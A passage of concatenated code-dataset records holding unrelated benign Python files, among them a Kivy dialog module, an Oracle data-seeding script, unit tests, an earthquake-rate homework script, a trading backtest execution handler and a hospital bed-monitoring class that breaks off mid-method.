format suitable fot inference\n\n Parameters\n ----------\n images : list\n list of images\n image_height : int\n Please...\n image_width : int\n Please...\n isGray : bool, optional\n True is the dataset is of 1-channel (gray) images, False if RGB\n\n Returns\n -------\n list\n list of video frames and list of labels (poses, which are garbage)\n \"\"\"\n\n x_test = np.stack(images, axis=0).astype(np.float32)\n if isGray == True:\n x_test = np.reshape(x_test, (-1, image_height, image_width, 1))\n else:\n x_test = np.reshape(x_test, (-1, image_height, image_width, 3))\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = [0, 0, 0, 0] * len(x_test)\n y_test = np.vstack(y_test[:]).astype(np.float32)\n y_test = np.reshape(y_test, (-1, 4))\n\n\n return [x_test, y_test]\n\n\n\n","sub_path":"PyTorch/DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"513828652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cx_Oracle\nimport random\n\ncon = cx_Oracle.connect('tp3cinema/password@localhost:1521')\n\ncur = con.cursor()\n\ncur.execute('select funcionario_ctps from funcionario')\n\nfuncionarios_ids = [data[0] for data in cur.fetchall()]\n\ncur.execute('select nome, funcao_id from funcao')\n\nfuncoes = {data[0]: data[1] for data in cur.fetchall()}\n\ncur.execute('select distinct horario from EXIBICAO')\n\nhorarios = [data[0] for data in cur.fetchall()]\n\nrandom.shuffle(horarios)\n\nfor hor in horarios:\n # requisito da lista, ao menos 4 funcionario trabalhando por horario\n qtd_trabalhando = random.randint(4, 15)\n random.shuffle(funcionarios_ids)\n cp_funcionarios = funcionarios_ids[:qtd_trabalhando + 1]\n\n # um gerente\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Gerente'], 'horario': hor})\n # um atendente\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Caixa'], 'horario': hor})\n # um projetista\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Projetista'], 'horario': hor})\n\n # um bilheteiro\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Bilheteiro'], 'horario': hor})\n\n for funcionario in cp_funcionarios:\n funcao_ = random.choice(funcoes.values())\n # nao pode haver 2 gerentes, caixas ou projetistas no mesmo horario\n while funcao_ == 27 or funcao_ == 29 or funcao_ == 34:\n funcao_ = random.choice(funcoes.values())\n\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': funcionario, 'funcao': funcao_, 'horario': hor})\n\n con.commit()\n\n\ncur.close()\ncon.close()\n","sub_path":"tp3tomcat/tp3sqldef/python scripts/exerce.py","file_name":"exerce.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549708613","text":"import os\n\nfrom kivy.lang import Builder\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.properties import StringProperty\nfrom functools import partial\nfrom src.calender import CustomDatePicker\nfrom src.db.manager import DatabaseManager\nfrom src.common_widget import CustomCheckBox\nfrom utils.data_tool import modify_date_form\nfrom utils import globals\nfrom settings import KVS_DIR\n\nBuilder.load_file(os.path.join(KVS_DIR, 'dialog_screen.kv'))\n\n\nclass OpenDialog(Popup):\n error = StringProperty()\n\n def __init__(self, time_stamp_ret, client, **kwargs):\n self.register_event_type('on_confirm')\n super(OpenDialog, self).__init__(**kwargs)\n self.date_picker = CustomDatePicker()\n self.db_manager = DatabaseManager()\n self.selected_btn = None\n self.time_stamp_data_info = []\n self.time_stamp_ret = time_stamp_ret\n self.selected_client = client\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.size_hint_y = 1\n self.size = (400, 250)\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size = (400, 250)\n\n def _enter(self):\n if not self.first_text or not self.second_text:\n self.error = \"Error: enter 2 dates\"\n else:\n self.dispatch('on_confirm', self.first_text, self.second_text)\n\n def _cancel(self):\n self.dismiss()\n\n def on_confirm(self, *args):\n pass\n\n def show_calendar(self, select_btn):\n self.selected_btn = select_btn\n self.date_picker.show_popup(1, 1)\n self.date_picker.bind(on_confirm=self.select_date)\n\n def select_date(self, *args):\n args[0].focus = False\n selected_date = args[1]\n if self.time_stamp_ret:\n self.time_stamp_data_info = \\\n self.db_manager.read_only_time_stamp(date=modify_date_form(f_date=selected_date),\n client=self.selected_client)\n if len(self.time_stamp_data_info) != 0:\n time_stamp_select = TimeStampDialog(t_s_info=self.time_stamp_data_info, title=\"Select time stamp\")\n time_stamp_select.bind(on_confirm=partial(self.get_time_stamp))\n time_stamp_select.open()\n else:\n if self.selected_btn == \"1\":\n self.ids.first_selected_date.text = selected_date\n else:\n self.ids.second_selected_date.text = selected_date\n\n def get_time_stamp(self, *args):\n\n args[0].dismiss()\n if self.selected_btn == \"1\":\n self.ids.first_selected_date.text = self.time_stamp_data_info[int(args[1])]\n else:\n self.ids.second_selected_date.text = self.time_stamp_data_info[int(args[1])]\n globals.checked_item = \"\"\n\n\nclass OpenFileDialog(Popup):\n error = StringProperty()\n\n def __init__(self, **kwargs):\n self.register_event_type('on_confirm')\n super(OpenFileDialog, self).__init__(**kwargs)\n self.selected_btn = None\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def _enter(self):\n if not self.first_text or not self.second_text:\n self.error = \"Error: enter 2 files\"\n else:\n self.dispatch('on_confirm', self.first_text, self.second_text)\n\n def _cancel(self):\n self.dismiss()\n\n def on_confirm(self, *args):\n pass\n\n def show_file_browser(self, select_btn):\n self.selected_btn = select_btn\n file_browser = LoadDialog()\n file_browser.bind(on_confirm=partial(self.get_selected_file))\n file_browser.open()\n\n def get_selected_file(self, *args):\n args[0].dismiss()\n file_path = args[1]\n file_name = args[2][0]\n file_full_path = os.path.join(file_path, file_name)\n if self.selected_btn == \"1\":\n self.ids.first_selected_file.text = file_full_path\n else:\n self.ids.second_selected_file.text = file_full_path\n\n\nclass TimeStampDialog(Popup):\n error = StringProperty()\n\n def __init__(self, t_s_info, title, **kwargs):\n super(TimeStampDialog, self).__init__(**kwargs)\n self.register_event_type('on_confirm')\n self.title = title\n self.set_widget(t_s_info=t_s_info)\n\n def set_widget(self, t_s_info):\n self.ids.time_stamp.clear_widgets(self.ids.time_stamp.children[:])\n self.ids.time_stamp.cols = 2\n for i, t_s_i in enumerate(t_s_info):\n self.ids.time_stamp.add_widget(CustomCheckBox(group='check', text=str(i), size_hint_x=0.2,\n color=[1.0, 1.0, 1.0, 1.0], size_hint_y=None, height=30))\n label_box = Label(size_hint_x=0.8, text=t_s_i, size_hint_y=None, height=30)\n self.ids.time_stamp.add_widget(label_box)\n self.ids.time_stamp.height = 30 * len(t_s_info)\n self.height = self.ids.time_stamp.height + 100\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def _enter(self):\n\n if globals.checked_item == \"\":\n self.error = \"Error: select one of above checks\"\n else:\n self.dispatch('on_confirm', globals.checked_item)\n\n def on_confirm(self, *args):\n pass\n\n def _cancel(self):\n self.dismiss()\n\n\nclass LoadDialog(Popup):\n error = StringProperty()\n\n def __init__(self, **kwargs):\n super(LoadDialog, self).__init__(**kwargs)\n self.register_event_type('on_confirm')\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def dismiss_popup(self):\n self.dismiss()\n\n def load(self):\n\n if not self.path or not self.filename:\n self.error = \"Error: select file\"\n else:\n file_ext = self.filename[0][self.filename[0].rfind(\".\") + 1:]\n if \"ack\" not in file_ext.lower():\n self.error = \"Select the correct ACK file\"\n else:\n self.dispatch('on_confirm', self.path, self.filename)\n\n def on_confirm(self, *args):\n pass\n\n\nif __name__ == '__main__':\n\n OpenDialog(time_stamp_ret=True, client=\"\")\n","sub_path":"src/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"210376754","text":"\n# Autor: Saul Rodrigo Toral Luna Matricula: A01745007\n# Descripción: El programa convertirá de coordenadas cartesianas a polares\n\n#1.- Ingresar valores para coordenadas (x,y)\nimport math\n\nx = input(\"Ingresa un valor para x: \")\ny = input(\"Ingresa un valor para y: \")\n\n#2.- Calcular el valor de la magnitud de \"r\"\n# Usando el teorema de pitagoras c= (x^2 + y^2)^1/2\n\nr = ((int(x)**2) + int(y)**2)**0.5\n\n#3.- Calcular el valor del angulo en grados.\n# Usando arctan(y/x)\n\ng = math.atan2(float(y),float(x))\n\n#4.- Al usar arctan, python regressa valores de -pi a pi\n# Por lo tanto para convertir a grados se multiplica por 180/pi\n\ngrados = (g) * (180/math.pi)\n\n#5.- Imprimir la magnitud de r y los grados\n\nprint(\"La magnitud de r es de: \", r)\nprint(\"Los grados son: \", grados)\n","sub_path":"coordenadas.py","file_name":"coordenadas.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"170382204","text":"import os\n\nimport panda3d.core as p3d\nfrom direct.showbase.ShowBase import ShowBase\nimport pytest #pylint:disable=wrong-import-order\n\nimport gltf\n\n#pylint:disable=redefined-outer-name\n\n\n@pytest.fixture(scope='session')\ndef showbase():\n p3d.load_prc_file_data('', 'window-type none')\n base = ShowBase()\n gltf.patch_loader(base.loader)\n return base\n\n@pytest.fixture\ndef modelpath():\n return p3d.Filename.from_os_specific(\n os.path.join(\n os.path.dirname(__file__),\n 'test.gltf'\n )\n )\n\ndef test_load_single(showbase, modelpath):\n showbase.loader.load_model(modelpath)\n\n\ndef test_load_multiple(showbase, modelpath):\n showbase.loader.load_model([modelpath, modelpath])\n showbase.loader.load_model({modelpath, modelpath})\n # doesn't work on Panda3D 1.10.4+\n # showbase.loader.load_model((modelpath, modelpath))\n","sub_path":"tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"158046774","text":"import unittest\nimport actExamples.likelihood as lhood\nimport numpy as np\nfrom ConfigParser import SafeConfigParser \n\ndef listFromConfig(Config,section,name):\n return [float(x) for x in Config.get(section,name).split(',')]\n\nclass LikeTests(unittest.TestCase):\n \n def setUp(self):\n iniFile = \"tests/config.ini\"\n self.Config = SafeConfigParser()\n self.Config.optionxform=str\n self.Config.read(iniFile)\n\n def test_model(self):\n model_true = np.loadtxt(self.Config.get(\"files\",\"testModelVec\"))\n vec = np.asarray(listFromConfig(self.Config,\"makeTest\",\"testVec\"))\n paramA = self.Config.getfloat(\"makeTest\",\"paramA\")\n paramB = self.Config.getfloat(\"makeTest\",\"paramB\")\n ans = lhood.model(vec,paramA,paramB)\n self.assertEqual(model_true.tolist(), ans.tolist())\n\n def test_lnLike(self):\n model = np.loadtxt(self.Config.get(\"files\",\"testModelVec\"))\n data = np.loadtxt(self.Config.get(\"files\",\"testDataVec\"))\n invc = np.loadtxt(self.Config.get(\"files\",\"testInvCov\"))\n ans = lhood.logLike(model,data,invc)\n expected = self.Config.getfloat(\"makeTest\",\"expected\")\n self.assertAlmostEqual(ans, expected,places=self.Config.getint(\"makeTest\",\"precisionPlaces\"))\n \n\nif __name__ == '__main__':\n unittest.main() \n","sub_path":"tests/testLike.py","file_name":"testLike.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"120798471","text":"import signup1\nimport getUser\nimport delUser\n\ndef doUser(email):\n baseUrl = 'http://localhost:50001'\n signup1.makeUser(email, baseUrl)\n userId = getUser.findUserIdByEmail(email, baseUrl)\n delUser.deleteUser(userId, baseUrl)\n\n\nfor i in range(1,5):\n email = f'jg+{i}@ajoursystem.dk'\n #email = f'jgaardsted+{i}@gmail.com'\n doUser(email)","sub_path":"signup/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"451847171","text":"#informacje o platformie, na której uruchomiony jest ten skrypt\n\ndef main():\n import platform\n profile = [\n platform.architecture(),\n platform.dist(),\n platform.libc_ver(),\n platform.mac_ver(),\n platform.machine(),\n platform.node(),\n platform.platform(),\n platform.processor(),\n platform.python_build(),\n platform.python_compiler(),\n platform.python_version(),\n platform.system(),\n platform.uname(),\n platform.version(),\n ]\n for i in profile:\n print(i)\nif __name__ == '__main__':\n main()","sub_path":"platform_info/platform_info.py","file_name":"platform_info.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"228828373","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 18 19:06:02 2019\r\nHomework #2 Astro 119\r\n@author: eric_\r\n\"\"\"\r\n#============================================================\r\n# problem 1 earthquake rates, earthquake and well locations\r\n#============================================================\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nWell_file = 'injWell_OK.txt' #data files\r\nSeism_file = 'seism_OK.txt'\r\n\r\n#=============================================================\r\n# load data\r\n#=============================================================\r\nWell_data = np.loadtxt(Well_file).T\r\nSeism_data = np.loadtxt(Seism_file).T\r\n\r\n#change date-time columns to decimal years\r\nDecYear = Seism_data[1] + ((Seism_data[2]-1)/12) + ((Seism_data[3]-1)/365.25)\\\r\n+ (Seism_data[4]/(365.25*24)) + (Seism_data[5]/(365.25*24*60)) +\\\r\n (Seism_data[6]/(365.25*24*3600))\r\n\r\n\r\n\r\n#================================================================\r\n# comp rate function\r\n#================================================================\r\nk_win = 200\r\ndef comp_rate( at, k_win):\r\n # smoothed rate from overlapping sample windows normalized by delta_t\r\n aS = np.arange( 0, at.shape[0]-k_win, 1)\r\n aBin, aRate = np.zeros(aS.shape[0]), np.zeros(aS.shape[0])\r\n iS = 0\r\n for s in aS:\r\n i1, i2 = s, s+k_win\r\n aBin[iS] = 0.5*( at[i1]+at[i2])\r\n aRate[iS] = k_win/( at[i2]-at[i1])\r\n iS += 1\r\n return aBin, aRate\r\n\r\n#================================================================\r\n# earthquake rate plot \r\n#================================================================\\\r\n#Using histograms\r\naBin, aRate = comp_rate(DecYear, k_win)\r\nbinsize = 1/12\r\naHistBins = np.arange(DecYear[0], DecYear[-1], (binsize))\r\naN_bin, aHistBins = np.histogram(DecYear, bins = aHistBins)\r\naN_bin = aN_bin/binsize\r\nplt.figure(3)\r\nplt.title(\"Earthquake rate\")\r\n\r\nearthquake_rate = plt.subplot(211)\r\nearthquake_rate.set_title(\"Using Histogram\")\r\nearthquake_rate.set_xlim(1973, 2020)\r\nearthquake_rate.set_xlabel(\"Time (yrs)\")\r\nearthquake_rate.set_ylabel(\"Number of Earthquakes\")\r\nearthquake_rate = plt.plot( aHistBins[0:-1]+.5*binsize, aN_bin, 'ko')\r\n\r\n\r\n#using comp rate funciton\r\naxis1 = plt.subplot(212)\r\naxis1.set_title(\"Using Comp Rate\")\r\naxis1.plot(aBin, aRate, 'ko', lw = .1, ms = 1)\r\naxis1.set_xlabel(\"Time (yrs)\"), axis1.set_ylabel(\"Number of Earthquakes\")\r\naxis1.set_xlim(1973, 2020)\r\nplt.show()\r\n\r\n#=================================================================\r\n# plot active wells\r\n#=================================================================\r\nyear_vector = np.genfromtxt(Well_file, skip_header = 1, usecols= (1), dtype = \\\r\n float)\r\n#print(year_vector)\r\nsort_id = year_vector.argsort()\r\nyear_vector = year_vector[sort_id]\r\n\r\n#=================================================================\r\n# for loop active wells\r\n#=================================================================\r\nsel_eq = 0\r\nsel_eq2 = 0\r\nfor i in np.arange(2005, 2013, 1): \r\n sel_eq = 0\r\n sel_eq2 = 0\r\n for it in range(np.shape(year_vector)[0]):\r\n if year_vector[it] > i and year_vector[it] < i + 0.5:\r\n sel_eq = sel_eq + 1\r\n var1 = sel_eq\r\n if year_vector[it] > i + 0.5 and year_vector[it] < i + 1:\r\n sel_eq2 = sel_eq2 + 1\r\n var2 = sel_eq2\r\n print(\"Number of active wells between Jan\", i, \"- June\", i, \": \", var1)\r\n \r\n print(\"Number of active wells between July\", i, \"- December\", i, \": \", \\\r\n var2)\r\n plt.figure(4000)\r\n plt.title(i)\r\n subplot_1 = plt.subplot(211)\r\n First_histo = plt.hist(var1, 1)\r\n subplot_2 = plt.subplot(212)\r\n Second_histo = plt.hist(var2, 1)\r\n #plt.show\r\n plt.pause(0.5)\r\n plt.clf\r\n\r\n\r\n#=================================================================\r\n# earthquakes from 2005 to 2018\r\n#=================================================================\r\nnum_earthquakes = 0\r\nnum_earthquakes2 = 0\r\nfor element in np.arange(2005, 2018, 0.5):\r\n num_earthquakes = 0\r\n num_earthquakes2 = 0\r\n var3 = 0\r\n var4 = 0\r\n for it in range(np.shape(DecYear)[0]):\r\n if DecYear[it] > element and DecYear[it] < element + 0.5:\r\n num_earthquakes += 1\r\n var3 = num_earthquakes\r\n if DecYear[it] > element + 0.5 and DecYear[it] < element + 1:\r\n num_earthquakes2 += 1\r\n var4 = num_earthquakes2\r\n plt.figure(5000)\r\n plt.title(element)\r\n e_subplot_1 = plt.subplot(211)\r\n e_First_histo = plt.hist(var3, 1)\r\n e_subplot_2 = plt.subplot(212)\r\n e_Second_histo = plt.hist(var4, 1)\r\n plt.pause(0.5)\r\n plt.clf\r\n \r\n\r\n\r\n#earthquakes seem to spike in 2013\r\n \r\n \r\n\"\"\"for it in np.unique(year_vector):\r\n if it > 2004 and it < it + 0.5:\r\n sel_eq = it == year_vector\r\n print(\"it= \", it, \"sel_eq.sum() = \", sel_eq.sum())\r\n elif it > 2004 and it > it + 0.5:\r\n sel_eq2 = it == year_vector\r\n print(\"it2 = \", it, \"sel_eq2.sum() = \", sel_eq2.sum())\"\"\"\r\n\r\n\r\n\"\"\"for it in np.unique(year_vector):\r\n if it > 2004:\r\n sel_eq3 = it == year_vector\r\n print(\"current year\", it, \"#no of active wells: \", sel_eq3.sum())\r\n plt.figure(2)\r\n subplot_1 = plt.subplot(211)\r\n subplot_1.set_xlim(0, 150)\r\n plt.hist(sel_eq3.sum(), 1)\r\n #plt.show\r\n plt.pause(0.5)\r\n plt.clf\"\"\"\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"hw2/submission/leeric/leeric_33229_1274761_HW2_earthquakes-1.py","file_name":"leeric_33229_1274761_HW2_earthquakes-1.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"579451880","text":"import pandas as pd\n\nfrom abc import ABC, abstractmethod\n\nfrom event import FillEvent, Order\nfrom event_queue import EventQueue\nfrom data_handler import DataHandler\n\nclass ExecutionHandler(ABC):\n @abstractmethod\n def send_order(self, order):\n pass\n\n\nclass BacktestExecutionHandler(ExecutionHandler):\n def __init__(self, queue, data_handler):\n self.queue = queue\n self.data_handler = data_handler\n\n def calculate_fill_cost(self, order, reach_time):\n if order.order_type == \"MKT\":\n try:\n quotes = self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:].iloc[0]\n except:\n return order.price\n if order.direction == \"BUY\":\n fill_price = quotes[\"askPrice\"]\n else:\n fill_price = quotes[\"bidPrice\"]\n return order.quantity * fill_price\n else:\n # will need self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:] too\n return order.price\n\n def calculate_fill_quantity(self, order, reach_time):\n # for non-market orders\n return int(order.quantity)\n\n def calculate_latency(self, order, send_time):\n # will eventually use self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:]\n # probably can split into send latency, receive latency\n return pd.Timedelta(\"3s\")\n\n def send_order(self, order, send_time):\n reach_time = send_time + self.calculate_latency(order, send_time)\n sign = [1, -1][order.direction == \"SELL\"]\n quantity = sign * self.calculate_fill_quantity(order, reach_time)\n cost = sign * self.calculate_fill_cost(order, reach_time)\n # will need to figure out how the fills and orders work for each exchange\n fe = FillEvent(reach_time, order.symbol, order.exchange, order.order_type, quantity, cost)\n self.queue.put(fe)\n\n\nif __name__ == \"__main__\":\n def read_trades_csv(trades_csv_path):\n df = pd.read_csv(\n trades_csv_path,\n usecols=[\"received\", \"size\", \"price\"],\n parse_dates=[\"received\"],\n index_col=\"received\",\n nrows=30000\n )\n return df\n\n def read_quotes_csv(quotes_csv_path):\n df = pd.read_csv(\n quotes_csv_path,\n usecols=[\"bidSize\", \"bidPrice\", \"askPrice\", \"askSize\", \"recorded\"],\n parse_dates=[\"recorded\"],\n index_col=\"recorded\",\n )\n df.index.name = \"received\"\n return df\n\n trades_csv_path = \"play_data/XBTUSD_trades_191214_0434.csv\"\n quotes_csv_path = \"play_data/XBTUSD_quotes_191214_0434.csv\"\n\n tdf = read_trades_csv(trades_csv_path)\n qdf = read_quotes_csv(quotes_csv_path)\n\n sym = \"XBTUSD\"\n all_data = {sym: {}}\n all_data[sym][\"TRADES\"] = tdf\n all_data[sym][\"QUOTES\"] = qdf\n\n init_cap = 100000\n start_time = tdf.index[1500] # start time\n\n dh = DataHandler(start_time, all_data)\n eq = EventQueue(start_time)\n eh = BacktestExecutionHandler(eq, dh)\n order = Order(sym, \"BitMEX\", \"MKT\", \"BUY\", 10, 0)\n\n eh.send_order(order, start_time)\n print(eq.get())\n","sub_path":"infrastructure/execution_handler.py","file_name":"execution_handler.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"135771083","text":"# Imports\nfrom flask import Flask, make_response\nfrom PIL import Image\nfrom io import BytesIO\n\napp = Flask(__name__)\n\n@app.route('/')\n@app.route('/')\ndef index(num_page=0):\n return \"Hello!!!\"+str(num_page)\n\n@app.route('/picture')\ndef picture():\n my_picture=BytesIO()\n Image.new(\"RGB\", (400,300), \"#13f\").save(my_picture, \"BMP\")\n response=make_response(my_picture.getvalue())\n response.mimetype=\"image/bmp\"\n return response\n\nif __name__=='__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"536915734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"MOD005622 TRI2 B01CAM\"\"\"\n__author__ = \"Tim Clarke\"\n__copyright__ = \"Copyright 2020, Tim Clarke/Zach Beed\"\n__license__ = \"Private\"\n__version__ = \"0.0.6\"\n\n# app-specific constants\nimport constants\nfrom module import Modules\n# PyQt libraries\nfrom PyQt5 import QtGui, uic, QtCore, QtWidgets\n\n\"\"\"\nbed.py\n\n created by: Tim Clarke\n date: 11mar2020\n purpose: bed class\n\"\"\"\n\nclass Beds():\n \"\"\"singleton collection and management of Bed data and objects\"\"\"\n _instance = None\n\n \"\"\"private dictionary of all beds and database object\"\"\"\n _beds = []\n _db = None\n\n def __new__(self, *args, **kwargs):\n \"\"\"singleton override\"\"\"\n if not self._instance:\n self._instance = object.__new__(self)\n return self._instance\n\n def __init__(self, db):\n self._db = db\n\n def getBeds(self):\n \"\"\"return all records for display\"\"\"\n colnames, data = self._db.query(\"\"\"\n SELECT bedid, bednumber\n FROM bed\n ORDER BY bednumber\"\"\", None)\n if colnames is not None:\n # store all the records individually as objects\n for record in data:\n moduleList = Modules(self._db).getModulesForBed(record[0])\n bed = Bed(self._db, record[0], record[1], constants.BAY_NUMBER, constants.STATION_NUMBER, moduleList)\n self._beds.append(bed)\n return self._beds\n\n def getBed(self, bedid):\n \"\"\"get specific bed by id\"\"\"\n for bed in self._beds:\n if bed.bedid == bedid:\n return bed\n\nclass Bed():\n \"\"\"Bed object\"\"\"\n \n \"\"\"private attributes\"\"\"\n _db = None\n _bedid = None\n _bednumber = None\n _bayid = None\n _stationid= None\n _modules = []\n _alarm = False\n _alarmMonitorTypes = {} # dictionary of alarm states, key is monitortype, value is a dictionary of the value, direction and unit\n _critalarm = False\n _critAlarmMonitorTypes = {} # dictionary of critical alarm states, key is monitortype, value is a dictionary of the value, direction and unit\n _patient = None\n\n def __init__(self, db, bedid, bednumber, bayid, stationid, modules):\n self._db = db\n self._bedid = bedid\n self._bednumber = bednumber\n self._bayid = bayid\n self._stationid = stationid\n self._modules = modules\n self._patientid = 2\n\n def addModule(self, module):\n \"\"\"add a module to the bed\"\"\"\n # prevent more than the maximum design number of modules being added \n if len(self._modules) > MAX_MODULES_PER_BED - 1:\n raise ValueError('cannot have more than {0} modules per bed'.format(MAX_MODULES_PER_BED))\n self._modules.add(module)\n\n def displayTitles(self):\n \"\"\"return a list of column names for display\"\"\"\n return ['id', 'Bed Number', \"Monitors\"]\n\n def display(self):\n \"\"\"return a displayable list of columns\"\"\"\n modules = []\n for module in self._modules:\n modules.append(module.shortDisplay())\n return self._bedid, self._bednumber, '\\n'.join(modules)\n\n def getBedid(self):\n \"\"\"return bedid\"\"\"\n return self._bedid\n\n bedid = property(getBedid)\n\n def getBedNumber(self):\n \"\"\"return bed number\"\"\"\n return self._bednumber\n\n bednumber = property(getBedNumber)\n\n def setMonitorTypeValue(self, monitortypeid, newvalue):\n \"\"\"set the monitortypeid for this bed to newvalue\"\"\"\n for module in self._modules:\n if monitortypeid in module.monitortypeids:\n module.setMonitorTypeValue(monitortypeid, newvalue, self)\n\n def alarmOn(self, monitortypeid, name, value, direction, unit):\n # only possible if there is a patient in the bed\n if self._patientid:\n \"\"\"receiving function for an alarm\"\"\"\n self._alarm = True\n # save the alarm status\n self._alarmMonitorTypes[monitortypeid] = [value, direction, unit]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_ALARM_ON, monitortypeid)\n\n def resetAlarm(self):\n \"\"\"cancel a standard alarm\"\"\"\n self._alarm = False\n\n def isAlarmOn(self):\n \"\"\"return state of alarm\"\"\"\n return self._alarm\n\n isAlarmOn = property(isAlarmOn)\n\n def alarmOff(self, monitortypeid):\n \"\"\"receiving function for an alarm\"\"\"\n self._alarm = False\n # save the alarm status if this alarm was set\n try:\n del self._alarmMonitorTypes[monitortypeid]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_ALARM_OFF, monitortypeid)\n except KeyError:\n # ignore, this alarm was not set\n pass\n\n def getAlarms(self):\n \"\"\"return displayable list of current alarms\"\"\"\n display = ''\n for key, value in self._alarmMonitorTypes.items():\n # assemble the name, the value, the direction and the unit\n display += str(value[0]) + value[1] + ' ' + value[2] + ' '\n return display\n\n alarms = property(getAlarms)\n\n def critAlarmOn(self, monitortypeid, name, value, direction, unit):\n # only possible if there is a patient in the bed\n if self._patientid:\n \"\"\"receiving function for a critical alarm\"\"\"\n self._critalarm = True\n # save the alarm status\n self._critAlarmMonitorTypes[monitortypeid] = [value, direction, unit]\n self._recordBedEvent(constants.BEDEVT_CRITALARM_ON, monitortypeid)\n\n def isCritAlarmOn(self):\n \"\"\"return state of critical alarm\"\"\"\n return self._critalarm\n\n isCritAlarmOn = property(isCritAlarmOn)\n\n def critAlarmOff(self, monitortypeid):\n \"\"\"receiving function for a critical alarm\"\"\"\n self._critalarm = False\n # save the alarm status if this alarm was set\n try:\n del self._critAlarmMonitorTypes[monitortypeid]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_CRITALARM_OFF, monitortypeid)\n except KeyError:\n # ignore, this alarm was not set\n pass\n\n def _recordBedEvent(self, bedeventtype, monitortypeid ):\n \"\"\"record a bed event in the audit trail in the database\"\"\"\n self._db.insert(\"\"\"\n INSERT INTO public.bedevent (eventtime, eventtype, patientid, bedid, monitortypeid)\n VALUES (now(), {}, {}, {}, {})\"\"\".format(bedeventtype, self._patientid, self._bedid, monitortypeid ))\n\n def UI(self, parentWidget):\n \"\"\"create a QtWidget with all the bed related ui components required\"\"\"\n #create groupbox in parent, size and title appropriately\n BedGroupBox = QtWidgets.QGroupBox(parentWidget)\n BedGroupBox.setFixedWidth(830)\n BedGroupBox.setObjectName(\"BedGroupBox\" + str(self._bedid))\n BedGroupBox.setTitle(QtCore.QCoreApplication.translate(\"MainWindow\", \"Bed: \" + str(self._bedid)))\n #create vertical layout inside groupbox to put monitors and controls in\n verticalLayoutWidget = QtWidgets.QWidget(BedGroupBox)\n verticalLayoutWidget.setGeometry(QtCore.QRect(100, 20, 741, 0))\n verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\" + str(self._bedid))\n verticalLayout_2 = QtWidgets.QVBoxLayout(verticalLayoutWidget)\n verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n verticalLayout_2.setObjectName(\"verticalLayout\" + str(self._bedid))\n #create checkbox to indicate alarms\n BedAlarm = QtWidgets.QCheckBox(BedGroupBox)\n 